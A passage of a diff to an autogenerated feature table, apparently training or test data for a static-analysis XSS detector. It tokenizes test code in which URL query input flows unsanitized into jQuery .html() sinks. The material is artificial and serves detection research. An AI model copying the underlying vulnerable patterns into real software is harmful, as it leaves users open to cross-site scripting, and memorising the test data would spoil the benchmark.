element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | $('myId ... taint5) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | $('myId ... taint5) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | $('myId ... taint5) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | $('myId ... taint5) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | $('myId ... taint5) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | exceptional return of $('myId ... taint5) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | exceptional return of $('myId ... taint5) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | exceptional return of $('myId ... taint5) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | exceptional return of $('myId ... taint5) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:3:397:31 | exceptional return of $('myId ... taint5) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:397:5:397:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:397:5:397:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:397:5:397:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17457,6 +121389,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:397:5:397:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:397:5:397:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:397:5:397:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:13:397:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:13:397:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:397:13:397:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:13:397:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:13:397:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:18:397:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:18:397:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:397:18:397:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:18:397:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:18:397:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:397:18:397:30 | target.taint5 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:397:18:397:30 | target.taint5 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:397:18:397:30 | target.taint5 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17464,6 +121406,108 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:397:18:397:30 | target.taint5 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:397:18:397:30 | target.taint5 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:397:18:397:30 | target.taint5 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:397:25:397:30 | taint5 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:397:25:397:30 | taint5 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:397:25:397:30 | taint5 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:397:25:397:30 | taint5 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:397:25:397:30 | taint5 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:8 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:8 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:8 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:8 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:8 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:15 | target.taint5 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:15 | target.taint5 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:15 | target.taint5 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:15 | target.taint5 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:15 | target.taint5 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:24 | target. ... "safe" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:24 | target. ... "safe" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:24 | target. ... "safe" | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:24 | target. ... "safe" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:398:3:398:24 | target. ... "safe" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:398:10:398:15 | taint5 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:398:10:398:15 | taint5 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:398:10:398:15 | taint5 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:398:10:398:15 | taint5 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:398:10:398:15 | taint5 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:398:19:398:24 | "safe" | assignedToPropName | taint5 | +| autogenerated/Xss/DomBasedXss/tst.js:398:19:398:24 | "safe" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:398:19:398:24 | "safe" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:398:19:398:24 | "safe" | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:398:19:398:24 | "safe" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:398:19:398:24 | "safe" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:8 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:8 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:8 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:8 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:8 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:15 | target.taint6 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:15 | target.taint6 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:15 | target.taint6 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:15 | target.taint6 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:15 | target.taint6 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:19 | target.taint6 = 2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:19 | target.taint6 = 2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:19 | target.taint6 = 2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:19 | target.taint6 = 2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:400:3:400:19 | target.taint6 = 2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:400:10:400:15 | taint6 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:400:10:400:15 | taint6 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:400:10:400:15 | taint6 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:400:10:400:15 | taint6 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:400:10:400:15 | taint6 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:400:19:400:19 | 2 | assignedToPropName | taint6 | +| autogenerated/Xss/DomBasedXss/tst.js:400:19:400:19 | 2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:400:19:400:19 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:400:19:400:19 | 2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:400:19:400:19 | 2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:400:19:400:19 | 2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:12 | random | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:12 | random | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:12 | random | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:12 | random | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:12 | random | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | exceptional return of random() | contextFunctionInterfaces | 